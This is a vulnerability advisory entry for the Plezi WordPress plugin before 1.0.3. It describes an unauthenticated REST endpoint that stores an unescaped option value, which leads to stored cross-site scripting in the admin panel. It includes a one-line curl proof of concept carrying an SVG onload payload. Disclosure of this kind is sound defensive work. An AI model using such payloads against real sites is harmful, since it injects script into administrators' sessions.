WordPress Plugin Vulnerabilities

Plezi < 1.0.3 - Unauthenticated Stored XSS

Description

The plugin has a REST endpoint allowing unauthenticated users to update the plz_configuration_tracker_enable option, which is then displayed in the admin panel without sanitisation and escaping, leading to a Stored Cross-Site Scripting issue

Proof of Concept

curl -X POST 'https://example.com/wp-json/plz/v2/configuration/update-tracker?switchstatus="><svg/onload=alert(`XSS`)>'

Affects Plugins

Fixed in 1.0.3

References

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Original Researcher
Brandon James Roldan
Submitter
Brandon James Roldan
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2022-03-07 (about 2 years ago)
Added
2022-03-07 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)

Other